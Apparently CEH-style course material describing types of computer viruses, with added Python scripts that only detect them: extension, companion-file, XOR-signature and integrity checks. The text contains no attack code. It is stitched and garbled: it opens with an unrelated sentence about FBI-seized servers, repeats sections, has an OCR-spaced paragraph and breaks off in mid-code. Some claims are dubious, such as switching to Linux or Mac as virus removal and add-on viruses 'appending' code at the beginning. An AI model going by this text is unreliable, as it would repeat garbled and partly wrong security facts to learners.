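Because the FBI kept the seized servers answering for a period, a machine pointed at one of these ranges could still resolve names and look healthy; the range check, not a working lookup, is the reliable indicator.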


Module Flow

Prior to this, we have discussed viruses and worms. Now we will discuss the different types of viruses.

- Virus and Worms Concepts
- Types of Viruses
- Computer Worms
- Malware Analysis
- Countermeasures
- Penetration Testing

This section describes the different types of viruses.

Types of Viruses

Types covered: System or Boot Sector Viruses, Stealth/Tunneling Viruses, Cluster Viruses, Encryption Viruses, Polymorphic Viruses, Metamorphic Viruses, Sparse Infector Viruses, Direct Action or Transient Viruses, Multipartite Viruses.

So far, we have discussed various virus and worm concepts. Now we will discuss various types of viruses. This section highlights various types of viruses and worms such as file and multipartite viruses, macro viruses, cluster viruses, stealth/tunneling viruses, encryption viruses, metamorphic viruses, shell viruses, and so on. Computer viruses are malicious software programs written by attackers to intentionally enter the targeted system without the user's permission. As a result, they affect the security system and performance of the machine. A few of the most common types of computer viruses that adversely affect security systems are discussed in detail on the following slides.

Viruses are classified depending on two categories:

- What do they infect?
- How do they infect?


What Do They Infect?

System or Boot Sector Viruses
The most common targets for a virus are the system sectors, which are nothing but the Master Boot Record and the DOS Boot Record system sectors. These are the areas on the disk that are executed when the PC is booted. Every disk has a system sector of some sort. They specially infect the floppy boot sectors and records of the hard disk. For example: Disk Killer and Stone virus.

File Viruses
Executable files are infected by file viruses, as they insert their code into the original file and get executed. File viruses are larger in number, but they are not the most commonly found. They infect in a variety of ways and can be found in a large number of file types.

Multipartite Virus
They infect program files, and this file in turn affects the boot sectors; examples are Invader, Flip, and Tequila.

Cluster Viruses
Cluster viruses infect files without changing the file or planting extra files; they change the DOS directory information so that entries point to the virus code instead of the actual program.

Macro Virus
Microsoft Word or a similar application can be infected through a computer virus called a macro virus, which automatically performs a sequence of actions when the application is triggered or something else. Macro viruses are somewhat less harmful than other types. They are usually spread via an email.

How Do They Infect?

Stealth Viruses
These viruses try to hide themselves from antivirus programs by actively altering and corrupting the chosen service call interrupts when they are being run. Requests to perform operations in respect to these service call interrupts are replaced by virus code. These viruses state false information to hide their presence from antivirus programs. For example, the stealth virus hides the operations that it modified and gives false representations. Thus, it takes over portions of the target system and hides its virus code.

Tunneling Viruses
These viruses trace the steps of interceptor programs that monitor operating system requests so that they get into BIOS and DOS to install themselves. To perform this activity, they even tunnel under antivirus software programs.


Encryption Viruses
This type of virus consists of an encrypted copy of the virus and a decryption module. The decrypting module remains constant, whereas different keys are used for encryption.

Polymorphic Viruses
These viruses were developed to confuse antivirus programs that scan for viruses in the system. It is difficult to trace them, since they change their characteristics each time they infect, i.e., every copy of this virus differs from its previous one. Virus developers have even created metamorphic engines and virus writing toolkits that make the code of an existing virus look different from others of its kind.

Metamorphic Viruses
Code that can reprogram itself is called metamorphic code. This code is translated into temporary code, and then converted back to the normal code. This technique, in which the original algorithm remains intact, is used to avoid pattern recognition by antivirus software. This is more effective in comparison to polymorphic code. This type of virus consists of complex, extensive code.

Overwriting File or Cavity Viruses
Some program files have areas of empty space. This empty space is the main target of these viruses. The Cavity Virus, also known as the Space Filler Virus, stores its code in this empty space. The virus installs itself in this unoccupied space without any destruction to the original code. It installs itself in the file it attempts to infect.

Sparse Infector Viruses
A sparse infector virus infects only occasionally (e.g., every tenth program executed) or only files whose lengths fall within a narrow range.

Companion Viruses
The companion virus stores itself by having the identical filename as the targeted program file. As soon as that file is executed, the virus infects the computer, and hard disk data is modified.

Camouflage Viruses
They disguise themselves as genuine applications of the user. These viruses are not difficult to find since antivirus programs have advanced to the point where such viruses are easily traced.

Shell Viruses
This virus code forms a layer around the target host program's code that can be compared to an "eggshell," making itself the original program and the host code its subroutine. Here, the original code is moved to a new location by the virus code and the virus assumes its identity.

File Extension Viruses
File extension viruses change the extensions of files; .TXT is safe, as it indicates a pure text file. If your computer's file extensions view is turned off and someone sends you a file named BAD.TXT.VBS, you will see only BAD.TXT.
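The two naming tricks described above, the companion virus (in the classic DOS case a PROG.COM placed beside PROG.EXE, because DOS runs the .COM first) and the file extension virus that hides an executable extension behind a harmless one, can both be looked for in a plain directory listing. The Python script below is an added example, not from the module; the listing and the extension sets are constructed, and a real run would pass it the output of os.listdir().

```python
"""Flag file names that fit the companion-virus and double-extension patterns (added example)."""
from collections import defaultdict
from pathlib import PurePosixPath

# Extension sets are this example's own, deliberately short lists.
EXECUTABLE_EXTS = {".exe", ".com", ".bat", ".cmd", ".scr", ".pif", ".vbs", ".js", ".wsf"}
BENIGN_EXTS = {".txt", ".doc", ".pdf", ".jpg", ".png", ".gif", ".mp3"}


def hidden_executable(name: str) -> bool:
    """BAD.TXT.VBS style: a benign-looking extension immediately before an executable one."""
    suffixes = [s.lower() for s in PurePosixPath(name).suffixes]
    return (
        len(suffixes) >= 2
        and suffixes[-1] in EXECUTABLE_EXTS
        and suffixes[-2] in BENIGN_EXTS
    )


def companion_pairs(names) -> dict:
    """Stems that carry more than one executable extension, e.g. EDIT.EXE beside EDIT.COM."""
    by_stem = defaultdict(set)
    for name in names:
        path = PurePosixPath(name)
        ext = path.suffix.lower()
        if ext in EXECUTABLE_EXTS:
            by_stem[path.stem.lower()].add(ext)
    return {stem: sorted(exts) for stem, exts in by_stem.items() if len(exts) > 1}


def scan(names) -> dict:
    """Run both checks over a listing and return the findings."""
    return {
        "hidden_executables": sorted(n for n in names if hidden_executable(n)),
        "companion_pairs": companion_pairs(names),
    }


# Constructed directory listing for the demonstration.
SAMPLE_LISTING = [
    "README.TXT", "BAD.TXT.VBS", "report.pdf.exe", "photo.jpg",
    "EDIT.EXE", "EDIT.COM", "setup.exe", "notes.doc", "archive.tar.gz",
]

if __name__ == "__main__":
    print(scan(SAMPLE_LISTING))
```

A companion pair is not proof of infection (some installers legitimately ship both forms), so treat the result as a list of files to hash and check against the vendor's originals rather than as a verdict.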

> '« f| Add -on V iru ses
M o s t v iru s e s a re a d d - o n v iru s e s . T his t y p e o f v ir u s a p p e n d s its c o d e t o t h e b e g in n in g
o f t h e h o s t c o d e w i t h o u t m a k in g a n y c h a n g e s t o t h e l a t t e r . T hu s , t h e v ir u s c o r r u p t s t h e s t a r t u p
i n f o r m a t i o n o f t h e h o s t c o d e , a n d places it s e lf in its p la ce, b u t it d o e s n o t t o u c h t h e h o s t c o d e .
H o w e v e r , t h e v iru s c o d e is e x e c u t e d b e f o r e t h e h o s t c o d e . T h e o n l y in d i c a t i o n t h a t t h e file is
c o r r u p t e d is t h a t t h e size o f t h e file has in c re a s e d .

Intrusive Viruses

This form of virus overwrites its code either by completely removing the target host's program code, or sometimes it only overwrites part of it. Therefore, the original code is not executed properly.

Direct Action or Transient Viruses

A direct action virus transfers all control to the host code where it resides, selects the target program to be modified, and corrupts it.

Terminate and Stay Resident Viruses (TSRs)

A TSR virus remains permanently in memory during the entire work session, even after the target host program is executed and terminated. It can be removed only by rebooting the system.


System or Boot Sector Viruses

- A boot sector virus moves the MBR to another location on the hard disk and copies itself to the original location of the MBR.
- When the system boots, the virus code is executed first and then control is passed to the original MBR.

System sector viruses can be defined as those that affect the executable code of the disk, rather than the boot sector virus that affects the DOS boot sector of the disk. Any system is divided into areas, called sectors, where the programs are stored.

The two types of system sectors are:

- MBR (Master Boot Record): MBRs are the most virus-prone zones because if the MBR is corrupted, all data will be lost.
- DBR (DOS Boot Record): The DOS boot sector is executed whenever the system is booted. This is the crucial point of attack for viruses.

The system sector consists of 512 bytes of memory. Because of this, system sector viruses conceal their code in some other disk space. The main carrier of system sector viruses is the floppy disk. These viruses generally reside in memory. They can also be caused by Trojans. Some sector viruses also spread through infected files, and they are called multipart viruses.


Virus Removal

System sector viruses are designed to create the illusion that there is no virus on the system. One way to deal with this virus is to avoid the use of the Windows operating system, and switch to Linux or Macs, because Windows is more prone to these attacks. Linux and Macintosh have a built-in safeguard to protect against these viruses. The other way is to carry out antivirus checks on a periodic basis.

FIGURE 7.6: System or Boot Sector Viruses (before infection / after infection: virus code in place of the MBR)


File and Multipartite Viruses

File Viruses

File viruses infect files that are executed or interpreted in the system such as COM, EXE, SYS, OVL, OBJ, PRG, MNU, and BAT files. File viruses can be either direct-action (non-resident) or memory-resident. Overwriting viruses cause irreversible damage to the files. These viruses mainly target a range of operating systems that include Windows, UNIX, DOS, and Macintosh.

Characterizing File Viruses

File viruses are mainly characterized and described based on their physical behavior or characteristics. One way to classify a file virus is by the type of file it targets, such as EXE or COM files, the boot sector, etc. A file virus can also be characterized based on how it infects the targeted file (also known as the host file):

- Prepending: writes itself into the beginning of the host file's code
- Appending: writes itself to the end of the host file
- Overwriting: overwrites the host file's code with its own code
- Inserting: inserts itself into gaps inside the host file's code
- Companion: renames the original file and writes itself with the host file's name
- Cavity infector: writes itself between file sections of a 32-bit file

File viruses are also classified based on whether they are non-memory resident or memory resident. Non-memory resident viruses search for EXE files on a hard drive and then infect them, whereas memory resident viruses stay actively in memory and trap one or more system functions. File viruses are said to be polymorphic, encrypted, or non-encrypted. A polymorphic or encrypted virus contains one or more decryptors and a main code. The main virus code is decrypted by the decryptor before it starts. An encrypted virus usually uses variable or fixed key decryptors, whereas polymorphic viruses have decryptors that are randomly generated from processor instructions and that consist of a lot of commands that are not used in the decryption process.
Execution of Payload:

- Time bomb: After a specified period of time
- Direct action: Immediately upon execution
- Condition triggered: Only under certain conditions

Multipartite Viruses

A multipartite virus, also known as a multi-part virus, attempts to attack both the boot sector and the executable or program files at the same time. When the virus is attached to the boot sector, it will in turn affect the system files, and then the virus attaches to the files, and this time it will in turn infect the boot sector.

FIGURE 7.7: File and Multipartite Viruses


Macro Viruses

- Macro viruses infect templates or convert infected documents into template files, while maintaining their appearance of ordinary document files.
- Most macro viruses are written using the macro language Visual Basic for Applications (VBA).

Microsoft Word or similar applications can be infected through a computer virus called a macro virus, which automatically performs a sequence of actions when the application is triggered or some other event occurs. Most macro viruses are written using the macro language Visual Basic for Applications (VBA) and they infect templates or convert infected documents into template files, while maintaining their appearance of ordinary document files. Macro viruses are somewhat less harmful than other types. They are usually spread via email. Pure data files do not allow the spread of viruses, but sometimes the line between a data file and an executable file is easily overlooked by the average user due to the extensive macro languages in some programs. In most cases, just to make things easy for users, the line between a data file and a program starts to blur only in cases where the default macros are set to run automatically every time the data file is loaded. Virus writers can exploit common programs with macro capability such as Microsoft Word, Excel, and other Office programs. Windows Help files can also contain macro code. In addition, the latest exploited macro code exists in the full version of the Acrobat program that reads and writes PDF files.

FIGURE 7.8: Macro Viruses (attacker, user, infected macro-enabled documents)

Cluster Viruses

- Cluster viruses modify directory table entries so that they point users or system processes to the virus code instead of the actual program.
- There is only one copy of the virus on the disk infecting all the programs in the computer system.
- It will launch itself first when any program on the computer system is started and then control is passed to the actual program.

Cluster viruses infect files without changing the file or planting extra files; they change the DOS directory information so that entries point to the virus code instead of the actual program. When a program runs under DOS, it first loads and executes the virus code, and then the virus locates the actual program and executes it. Dir-2 is an example of this type of virus. Cluster viruses modify directory table entries so that directory entries point to the virus code. There is only one copy of the virus on the disk infecting all the programs in the computer system. It will launch itself first when any program on the computer system is started and then control is passed to the actual program.


Stealth/Tunneling Viruses

- These viruses evade the anti-virus software by intercepting its requests to the operating system.
- A virus can hide itself by intercepting the anti-virus software's request to read the file and passing the request to the virus, instead of the OS.
- The virus can then return an uninfected version of the file to the antivirus software, so that it appears as if the file is "clean".

Stealth Viruses

These viruses try to hide themselves from antivirus programs by actively altering and corrupting the chosen service call interrupts when they are being run. Requests to perform operations in respect to these service call interrupts are replaced by virus code. These viruses state false information to hide their presence from antivirus programs. For example, the stealth virus hides the operations that it modified and gives false representations. Thus, it takes over portions of the target system and hides its virus code.

The stealth virus hides itself from antivirus software by hiding the original size of the file or temporarily placing a copy of itself in some other drive of the system, thus replacing the infected file with the uninfected file that is stored on the hard drive.

A stealth virus hides the modifications that it makes. It takes control of the system's functions that read files or system sectors and, when another program requests information that has already been modified by the virus, the stealth virus reports the original information to the requesting program instead. This virus also resides in memory.

To avoid detection, these viruses always take over system functions and use them to hide their presence.


One of the carriers of the stealth virus is the rootkit. Installing a rootkit generally results in this virus attack because rootkits are installed via Trojans, and thus are capable of hiding any malware.

Removal:

- Always do a cold boot (boot from a write-protected floppy disk or CD)
- Never use DOS commands such as FDISK to fix the virus
- Use antivirus software

Tunneling Viruses

These viruses trace the steps of interceptor programs that monitor operating system requests so that they get into BIOS and DOS to install themselves. To perform this activity, they even tunnel under antivirus software programs.
FIGURE 7.9: Working of Stealth/Tunneling Viruses (the anti-virus software asks for the system file TCPIP.SYS; the virus hides the infected TCPIP.SYS and hands back the original TCPIP.SYS)

Encryption Viruses

- This type of virus uses simple encryption to encipher the code.
- The virus is encrypted with a different key for each infected file.
- AV scanners cannot directly detect these types of viruses using signature detection methods.

This type of virus consists of an encrypted copy of the virus and a decryption module. The decrypting module remains constant, whereas different keys are used for encryption. These viruses generally employ XOR on each byte with a randomized key.

- The virus is enciphered with an encryption key, and an infected file consists of a decryption module and an encrypted copy of the code.
- For each infected file, the virus is encrypted by using a different combination of keys, but the decrypting module part remains unchanged.
- It is not possible for the virus scanner to directly detect the virus by means of signatures, but the decrypting module can be detected.
- The decryption technique employed is to XOR each byte with a randomized key that is generated and saved by the root virus.
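The points above, as an added example that is not part of the CEH courseware: a constant stand-in decryptor stub, a harmless text body enciphered by XOR under two different one-byte keys, a substring signature scanner that misses the body but still hits the stub, and the analyst-side step of keying on the constant stub to recover and scan the body in the clear. The stub bytes, the body text and the stub || key || ciphertext layout are constructed assumptions for the demonstration, not the layout of any real virus.

```python
from typing import Dict, List, Optional

# Constructed stand-in for the constant decryption module that, as the text
# says, stays the same in every infected file. It is a label, not code.
DECRYPTOR_STUB = b"DECRYPTOR-STUB:"

# Constructed, harmless stand-in for the virus body (plain text, not code).
PLAIN_BODY = b"sample body text standing in for the enciphered virus code"


def xor_bytes(data: bytes, key: int) -> bytes:
    """XOR every byte with a one-byte key, the scheme the text describes.
    XOR is its own inverse, so the same call encrypts and decrypts."""
    return bytes(b ^ key for b in data)


def build_infected_blob(body: bytes, key: int) -> bytes:
    """Lay out what an infected file carries according to the text:
    constant decryptor || key byte || body XOR-enciphered under that key.
    (The position of the key byte is an assumption of this example.)"""
    if not 0 < key < 256:
        raise ValueError("key must be a non-zero byte value")
    return DECRYPTOR_STUB + bytes([key]) + xor_bytes(body, key)


def signature_scan(blob: bytes, signatures: Dict[str, bytes]) -> List[str]:
    """Plain substring matching, i.e. the signature method the text says
    cannot see the body. Returns the names of the signatures that hit."""
    return [name for name, sig in signatures.items() if sig in blob]


def recover_body(blob: bytes) -> Optional[bytes]:
    """Analyst-side recovery: because the decryptor is constant, a scanner
    can key on it, read the key stored right after it and undo the XOR,
    then signature-scan the body in the clear."""
    idx = blob.find(DECRYPTOR_STUB)
    if idx < 0:
        return None
    key_pos = idx + len(DECRYPTOR_STUB)
    if key_pos >= len(blob):
        return None
    key = blob[key_pos]
    return xor_bytes(blob[key_pos + 1:], key)


def demo() -> Dict[str, object]:
    """Two 'infections' of the same body under different keys: the raw
    scan only ever sees the stub, the decrypted scan sees the body."""
    sigs = {"body": PLAIN_BODY, "stub": DECRYPTOR_STUB}
    blob1 = build_infected_blob(PLAIN_BODY, 0x5A)
    blob2 = build_infected_blob(PLAIN_BODY, 0xA7)
    return {
        "ciphertexts_differ": xor_bytes(PLAIN_BODY, 0x5A) != xor_bytes(PLAIN_BODY, 0xA7),
        "raw_scan_1": signature_scan(blob1, sigs),
        "raw_scan_2": signature_scan(blob2, sigs),
        "decrypted_scan_1": signature_scan(recover_body(blob1) or b"", sigs),
        "decrypted_scan_2": signature_scan(recover_body(blob2) or b"", sigs),
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(name, value)
```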

FIGURE 7.10: Working of Encryption Viruses (one virus code, enciphered differently in Encryption Virus 1, 2 and 3)

Polymorphic Code

- Polymorphic code is code that mutates while keeping the original algorithm intact.
- To enable polymorphic code, the virus has to have a polymorphic engine (also called a mutating engine or mutation engine).
- A well-written polymorphic virus therefore has no parts that stay the same on each infection.

Polymorphic viruses modify their code for each replication in order to avoid detection. They accomplish this by changing the encryption module and the instruction sequence. A random number generator is used for implementing polymorphism.

A mutation engine is generally used to enable polymorphic code. The mutator provides a sequence of instructions that a virus scanner can use to optimize an appropriate detection algorithm. Slow polymorphic codes are used to prevent antivirus professionals from accessing the codes.

Virus samples, which are bait files infected after a single execution, contain a similar copy of the virus. A simple integrity checker is used to detect the presence of a polymorphic virus on the system's disk.

FIGURE 7.11: How Polymorphic Code Works (user runs an infected program; the decryptor routine decrypts the virus code and the encrypted mutation engine (EME) in RAM; the virus does the damage and instructs the engine to produce a new polymorphic virus)

Polymorphic viruses consist of three components: the encrypted virus code, the decryptor routine, and the mutation engine. The function of the decryptor routine is to decrypt the virus code. It decrypts the code only after taking control over the computer. The mutation engine generates randomized decryption routines. This decryption routine varies every time a new program is infected by the virus.

With a polymorphic virus, both the mutation engine and the virus code are encrypted. When a program that is infected with a polymorphic virus is run by the user, the decryptor routine takes complete control over the system, after which it decrypts the virus code and the mutation engine. Next, control of your system is transferred by the decryption routine to the virus, which locates a new program to infect. In RAM (Random Access Memory), the virus makes a replica of itself as well as the mutation engine. Then the virus instructs the encrypted mutation engine to generate a new randomized decryption routine, which has the capability of decrypting the virus. Here, this new copy of both the virus code and mutation engine is encrypted by the virus. Thus, this virus, along with the newly encrypted virus code and encrypted mutation engine (EME), appends this new decryption routine onto a new program, thereby continuing the process.

Polymorphic viruses that are spread by the attacker in targeted systems are difficult to detect because the virus body is encrypted and the decryption routine changes from infection to infection, so no two infections look the same; this makes it difficult for the virus scanner to identify this virus.


Metamorphic Viruses

- Metamorphic viruses rewrite themselves completely each time they are to infect a new executable.
- Metamorphic code can reprogram itself by translating its own code into a temporary representation and then back to the normal code again.
- For example, W32/Simile consisted of over 14000 lines of assembly code, 90% of it part of the metamorphic engine.

Some viruses rewrite themselves to infect newly executed files. Such viruses are complex and use metamorphic engines for execution.

Code that can reprogram itself is called metamorphic code. This code is translated into temporary code, and then converted back to the normal code. This technique, in which the original algorithm remains intact, is used to avoid pattern recognition by antivirus software. This is more effective in comparison to polymorphic code. This type of virus consists of complex extensive code.

The commonly known metamorphic viruses are:

Win32/Simile: This virus is written in assembly language and destined for Microsoft Windows. This process is complex, and nearly 90% of the virus code is generated by this process.

Zmist: Zmist is also known as Zombie.Mistfall. It is the first virus to use the technique called "code integration." This code inserts itself into other code, regenerates the code, and rebuilds the executable.

FIGURE 7.12: Metamorphic Viruses Screenshot (a.) Variant A; b.) Variant B; c.) the "Unofficial" Variant C; d.) the .D variant, which was the "official" C of the original author)

File Overwriting or Cavity Viruses

- A cavity virus overwrites a part of the host file with a constant (usually nulls), without increasing the length of the file and preserving its functionality (original file size: 45 KB; infected file size: 45 KB).

These are also known as space-fillers since they maintain a constant file size while infected by installing themselves into the target program. They append themselves to the end of files and also corrupt the start of files. This trigger event first activates and executes the virus code, and later the original application program.

Some program files have areas of empty space. This empty space is the main target of these viruses. The Cavity Virus, also known as the Space Filler Virus, stores its code in this empty space. The virus installs itself in this unoccupied space without any destruction to the original code. It installs itself in the file it attempts to infect.

This type of virus is rarely used because it is difficult to write. A newer Windows file format called the Portable Executable is designed for the fast loading of programs. However, it leaves a certain gap in the file while it is being executed that can be used by the Space Filler Virus to insert itself. The most popular virus family is the CIH virus.
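The add-on virus indicator (the file size has increased), the integrity checker the Polymorphic Code section names, and the constant-size cavity infection described above can all be demonstrated with one baseline-and-compare checker; this is an added example, not code from the courseware. The three stand-in program files it creates in a temporary directory, and the bytes it writes into them, are constructed for the demonstration.

```python
import hashlib
import os
import tempfile
from typing import Dict, List, Tuple

Fingerprint = Tuple[int, str]  # (size in bytes, SHA-256 hex digest)


def fingerprint(path: str) -> Fingerprint:
    """Size and SHA-256 of one file, read in chunks."""
    digest = hashlib.sha256()
    size = 0
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            digest.update(chunk)
            size += len(chunk)
    return size, digest.hexdigest()


def build_baseline(paths: List[str]) -> Dict[str, Fingerprint]:
    """Record the known-good state. In practice this baseline is kept
    somewhere the monitored host cannot alter (a stealth virus that
    intercepts file reads would otherwise feed the checker clean data)."""
    return {p: fingerprint(p) for p in paths}


def check_against_baseline(baseline: Dict[str, Fingerprint]) -> Dict[str, str]:
    """Return {path: finding} for every file that no longer matches.
    Size alone is not enough: a cavity infection keeps the size constant,
    so the digest is what decides; the size only classifies the change."""
    findings: Dict[str, str] = {}
    for path, (size0, digest0) in baseline.items():
        if not os.path.exists(path):
            findings[path] = "missing"
            continue
        size, digest = fingerprint(path)
        if digest == digest0:
            continue
        if size > size0:
            findings[path] = f"grew by {size - size0} bytes (prepended/appended code?)"
        elif size == size0:
            findings[path] = "same size, contents changed (overwrite or cavity infection?)"
        else:
            findings[path] = f"shrank by {size0 - size} bytes"
    return findings


def demo() -> Dict[str, str]:
    """Constructed scenario in a temp dir: three stand-in 'programs'. One
    gets constructed bytes prepended (add-on style), one has a run of zero
    padding overwritten in place (cavity style), one is left alone."""
    root = tempfile.mkdtemp()
    addon = os.path.join(root, "ADDON.EXE")
    cavity = os.path.join(root, "CAVITY.EXE")
    clean = os.path.join(root, "CLEAN.EXE")
    header = b"host header stand-in"
    with open(addon, "wb") as fh:
        fh.write(b"host program stand-in\n")
    with open(cavity, "wb") as fh:
        fh.write(header + b"\x00" * 64 + b"host tail stand-in")
    with open(clean, "wb") as fh:
        fh.write(b"untouched program stand-in\n")
    baseline = build_baseline([addon, cavity, clean])

    # Simulated add-on infection: constructed bytes placed before the host.
    with open(addon, "rb") as fh:
        original = fh.read()
    with open(addon, "wb") as fh:
        fh.write(b"<constructed prepended bytes>" + original)
    # Simulated cavity infection: overwrite part of the zero padding; the
    # file size does not change, only the digest does.
    with open(cavity, "r+b") as fh:
        fh.seek(len(header))
        fh.write(b"<constructed filler>")

    findings = check_against_baseline(baseline)
    return {os.path.basename(p): f for p, f in findings.items()}


if __name__ == "__main__":
    for name, finding in demo().items():
        print(name, "->", finding)
```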

FIGURE 7.13: File Overwriting or Cavity Virus (original file size: 45 KB; infected file size: 45 KB)

Sparse Infector Viruses

- A sparse infector virus infects only occasionally (e.g. every tenth program executed), or only files whose lengths fall within a narrow range.
- By infecting less often, such viruses try to minimize the probability of being discovered.
- Infection process: wake up on the 15th of every month and execute code.

Sparse infector viruses infect only occasionally (e.g., every tenth program executed or on a particular day of the week) or only files whose lengths fall within a narrow range. By infecting less often, these viruses try to minimize the probability of being discovered.

FIGURE 7.14: Working of Sparse Infector Viruses (trigger condition: wake up on the 15th of every month and execute code)


Companion/Camouflage Viruses

- A companion virus creates a companion file for each executable file the virus infects
- Therefore, a companion virus may save itself as notepad.com and every time a user executes notepad.exe (good program), the computer will load notepad.com (virus) and infect the system
- Slide figure: the attacker's virus infects the system with a file notepad.com and saves it in the c:\winnt\system32 directory, where it sits beside Notepad.exe

Companion/Camouflage Viruses

Companion Viruses

The companion virus stores itself by having the identical file name as the targeted
program file. As soon as that file is executed, the virus infects the computer, and hard disk data
is modified.
Companion viruses exploit the DOS rule that a COM file is run before an EXE file of the same
name. The virus installs an identically named COM file and in that way infects the EXE files.

Source: http://www.cknow.com/vtutor/CompanionViruses.html

Here is what happens: Suppose a companion virus is executing on your PC and decides it is time
to infect a file. It looks around and happens to find a file called PGM.EXE. It now creates a file
called PGM.COM, containing the virus. The virus usually plants this file in the same directory as
the .EXE file, but it could place it in any directory on your DOS path. If you type PGM and press
Enter, DOS executes PGM.COM instead of PGM.EXE. (In order, DOS will execute COM, then
EXE, and then BAT files of the same root name, if they are all in the same directory.) The virus
executes, possibly infecting more files, and then loads and executes PGM.EXE. The user
probably would fail to notice anything is wrong. It is easy to detect a companion virus just by
the presence of the extra COM file in the system.
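The detection heuristic in the last sentence, as an added example that is not part of the module or of the cited cknow page: a Python script that scans a directory for a .COM file sharing its root name with an .EXE, the pair that DOS resolves in COM-before-EXE order. The directory contents are constructed in a temporary folder; the file names other than notepad.exe and notepad.com are assumed for illustration.

```python
"""Find companion-virus candidates: a .COM whose root name matches an .EXE
in the same directory. Added example, not code from the CEH module."""
import os
import tempfile
from pathlib import Path


def find_companions(directory):
    """Return sorted (com_file, exe_file) pairs found in `directory`.

    A bare program name typed at a DOS/Windows prompt is resolved as COM,
    then EXE, then BAT. Only a .COM can therefore shadow an .EXE of the same
    root name, so that is the only pairing reported. Matching is
    case-insensitive, as it is on DOS/Windows file systems."""
    by_root = {}
    for entry in Path(directory).iterdir():
        if not entry.is_file():
            continue
        root, ext = os.path.splitext(entry.name.lower())
        by_root.setdefault(root, {})[ext] = entry.name
    findings = []
    for exts in by_root.values():
        if ".exe" in exts and ".com" in exts:
            findings.append((exts[".com"], exts[".exe"]))
    return sorted(findings)


def build_sample_dir():
    """Constructed sample directory: notepad.exe with a suspicious
    NOTEPAD.COM beside it, plus files that must not be flagged
    (an .EXE without a companion, a text file, a .BAT that an .EXE already
    outranks)."""
    d = tempfile.mkdtemp()
    for name in ("notepad.exe", "NOTEPAD.COM", "calc.exe", "readme.txt", "calc.bat"):
        # "MZ" is the real executable header magic; the rest is filler
        Path(d, name).write_bytes(b"MZ" if name.lower().endswith(".exe") else b"")
    return d


if __name__ == "__main__":
    for com, exe in find_companions(build_sample_dir()):
        print(f"companion candidate: {com} shadows {exe}")
```

Run against a real directory by passing its path to find_companions(); an empty list means no .COM/.EXE root-name collision was found.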


FIGURE 7.15: Working of Companion/Camouflage Viruses (the attacker's virus infects the system with a file notepad.com saved in the c:\winnt\system32 directory beside Notepad.exe)


Shell Viruses

- Virus code forms a shell around the target host program's code, making itself the original program and the host code its subroutine
- Almost all boot program viruses are shell viruses
- Before infection: Original Program. After infection: Virus Code wrapped around the Original Program

Shell Viruses

A shell virus code forms a layer around the target host program's code that can be
compared to an "eggshell," making itself the original program and the host code its subroutine.
Here, the original code is moved to a new location by the virus code and the virus assumes its
identity.

FIGURE 7.16: Working of Shell Viruses (before infection: Original Program; after infection: Virus Code enclosing the Original Program)


File Extension Viruses

- File extension viruses change the extensions of files
- .TXT is safe as it indicates a pure text file
- With extensions turned off, if someone sends you a file named BAD.TXT.VBS, you will only see BAD.TXT
- If you have forgotten that extensions are turned off, you might think this is a text file and open it
- This is an executable Visual Basic Script virus file and could do serious damage
- Countermeasure is to turn off "Hide file extensions" in Windows (slide shows the Folder Options > View dialog)

File Extension Viruses

Source: http://www.cknow.com/vtutor/FileExtensions.html

- File extension viruses change the extensions of files
- .TXT is safe as it indicates a pure text file
- With extensions turned off, if someone sends you a file named BAD.TXT.VBS, you can only see BAD.TXT
- If you have forgotten that the extensions are actually turned off, you might think this is a text file and open it
- This is an executable Visual Basic Script virus file that could do serious damage

The countermeasure is to turn off "Hide file extensions" in Windows, as shown in the following
screenshot:


FIGURE 7.17: Uncheck Hide File Extensions (Folder Options > View > Advanced settings: clear the "Hide extensions for known file types" checkbox, then click Apply and OK)


Add-on and Intrusive Viruses

- Add-on viruses append their code to the host code without making any changes to the latter or relocate the host code to insert their own code at the beginning
- Slide figure, Add-on Viruses: Original Program becomes Original Program plus appended viral code, entered through a jump
- Slide figure, Intrusive Viruses: viral code overwrites part of the Original Program

Add-on and Intrusive Viruses

Add-on Viruses

Most viruses are add-on viruses. This type of virus appends its code to the beginning
of the host code without making any changes to the latter. Thus, the virus corrupts the startup
information of the host code and places itself in its place, but it does not touch the host code.
However, the virus code is executed before the host code. The only indication that the file is
corrupted is that the size of the file has increased.
FIGURE 7.18: Working of Add-on Viruses (Original Program before; afterwards the Original Program with a JUMP into the appended viral code)


Intrusive Viruses

Intrusive viruses overwrite their code either by completely removing the target host's
program code or sometimes overwriting only part of it. Therefore, the original code is not
executed properly.

FIGURE 7.19: Working of Intrusive Viruses (Original Program before; afterwards the viral code has overwritten part of the Original Program)
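An added example, not code from the module, that ties together the detection points made for cavity viruses (Figure 7.13: the infected file is the same 45 KB as the original), add-on viruses (the only sign is the increased file size) and intrusive viruses (host code overwritten in place): a Python integrity check that records a size and SHA-256 baseline for a constructed sample file, simulates the three modification patterns with harmless marker bytes, and shows that a size-only comparison misses two of them while a hash comparison catches all three. The HOST and STAMP byte strings are constructed for the demonstration and are not real code.

```python
"""Why a size check is not an integrity check. Added example, not from the
CEH module: simulates add-on, cavity and intrusive modifications on a
constructed file and compares size-only against hash-based detection."""
import hashlib
import tempfile
from pathlib import Path

# Constructed stand-in for a program image: a header, "code" bytes and a run of
# zero padding like the alignment gap a cavity virus looks for in a PE section.
HOST = b"HEADER" + b"\x90" * 64 + b"\x00" * 32 + b"TRAILER"
STAMP = b"X" * 16   # constructed marker bytes standing in for inserted code


def snapshot(path):
    """Baseline record for one file: size in bytes and SHA-256 digest."""
    data = Path(path).read_bytes()
    return {"size": len(data), "sha256": hashlib.sha256(data).hexdigest()}


def compare(baseline, current):
    """Report which checks notice a change between two snapshots."""
    return {
        "size_changed": baseline["size"] != current["size"],
        "hash_changed": baseline["sha256"] != current["sha256"],
    }


def simulate(kind, data):
    """Apply one of the three modification patterns described in the text."""
    if kind == "add-on":       # code put in front of the host: file grows
        return STAMP + data
    if kind == "cavity":       # unused zero gap filled in place: size unchanged
        gap = data.index(b"\x00" * 32)
        return data[:gap] + STAMP + data[gap + len(STAMP):]
    if kind == "intrusive":    # host's first bytes overwritten: size unchanged
        return STAMP + data[len(STAMP):]
    raise ValueError(kind)


def run_demo():
    """Return {pattern: compare() result} after each simulated modification."""
    workdir = Path(tempfile.mkdtemp())
    host = workdir / "host.bin"
    host.write_bytes(HOST)
    baseline = snapshot(host)            # taken while the file is known-good
    results = {}
    for kind in ("add-on", "cavity", "intrusive"):
        host.write_bytes(simulate(kind, HOST))
        results[kind] = compare(baseline, snapshot(host))
    return results


if __name__ == "__main__":
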